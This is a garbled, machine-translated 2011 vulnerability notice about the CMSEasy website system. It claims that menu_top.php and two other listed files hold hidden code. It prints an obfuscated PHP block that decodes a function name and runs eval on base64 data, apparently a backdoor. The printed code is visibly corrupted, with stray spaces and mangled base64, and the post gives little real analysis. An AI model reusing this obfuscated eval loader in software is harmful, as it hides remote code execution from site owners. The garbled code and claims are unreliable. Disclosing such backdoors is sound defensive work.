- Through the enterprise website for the latest 0DAY vulnerabilities-vulnerability warning-the black bar safety net

2011-06-28T00:00:00
ID MYHACK58:62201131065
Type myhack58
Reporter 佚名
Modified 2011-06-28T00:00:00

Description

Easy to pass business website system also known as the easy pass enterprise web applications, is easy through the company developed China's first to provide free corporate website template marketing type enterprise website management system, The system front to generate html, in full compliance with SEO, while there are online customer, potential customer tracking, easy business website template creation, search engine promotion and other functions of the enterprise website system.

Official website: http://www.cmseasy.cn/

The vulnerability appears in menu_top. php this file, see code

<? php // Copyright(C) 2009-2011 www.cmseasy.cn, All rights reserved.

$OOO0O0O00=FILE;$OOO000000=urldecode('%7 4%6 8%3 6%7 3%6 2%6 5%6 8%7 1%6c%6 1% 3 4% 6 3%6f%5f%7 3%6 1%6 4%6 6%7 0%6e%7 2');$OO00O0000=9 2;$OOO0000O0=$OOO000000{4}.$ OOO000000{9}.$ OOO000000{3}.$ OOO000000{5};$OOO0000O0.=$ OOO000000{2}.$ OOO000000{1 0}.$ OOO000000{1 3}.$ OOO000000{1 6};$OOO0000O0.=$ OOO0000O0{3}.$ OOO000000{1 1}.$ OOO000000{1 2}.$ OOO0000O0{7}.$ OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAw

MDAwezE3fS4kT09PMDAwMDAwezEyfS4kt09pmdawmdaweze4fs4kt

09PMDAwMDAwezV9LiRPT08wMDAwMDB7Mtl9o2lmkcewksrpmdawtzbpm

DA9JE9PME9PMDAwMCgkT09PME8wTzAwLcdyyicpoyrptzbptzawme89je9ptzawmd

AwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9ptzawmdawmhs1fs4kt09pmdawmdawezl9lirp

T08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9je9ptzawmdawmhsxnh0uje9ptzawmdawmhswfs4kt09pm

DAwMDAwezIwfS4kT09PMDAwMDAwezB9Lirpt08wmdawmdb7mjb9oyrptzbptzawme8oj

E8wMDBPME8wMCwxMTk0KTskT08wME8wMe8wpsgkt09pmdawme8wkcrptzbptzawtzaoje9

PME9PMDAwTygkTzAwME8wTzAwLDM4MCksj0vudgvyew91d2toukhzs05xt1vuqwfcyknjrgrgzkdnsw

lKakxsTW1QcFFxU3NWdlh4WnowMTIzNDu2nzg5ky89jywnqujdrevgr0hjs

ktMTU5PUFFSU1RVVldYWVphYmNkZWZnaglqa2xtbm9wcxjzdhv2d3h5ejaxmjm0nty3od

krLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?& gt;

kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19ouaxyb18mrtwmwj4lt09nhr8xtzex

RJwmwJXPkr9NTzEXHenNHtILT08XT08Xhr8xhtontznntzexhr8pkr8xhennhr8xhtxlt

08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylrtlfnaaoncakjw2yrcrcmo2fkdapqtoxydanxabytf1c2buidgjex

HjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhu0xytl9waaktayaba1icbmyjc2olcmfpdbpqdo1vd3nxfmy0fbc3gul6herzhz

W1YjF4KUSvkZLphUL7cMYSd3YlhtONHeextznnheepk2a2cbxpkr9nhennhennhtl7ewpzcbo1fm4icbkzcblpewpm5

D6J5pZYkz0+fbkSKjpjFMaifoAPk2lVcoa4R2lVcoa4r21vct9jcbxpfmamhuxytjl7

PHP not too will analysis, website also there is such a vulnerability

There are many paths...

lib/mods/celive/menu_top.php

lib/default/ballot_act.php

lib/default/special_act.php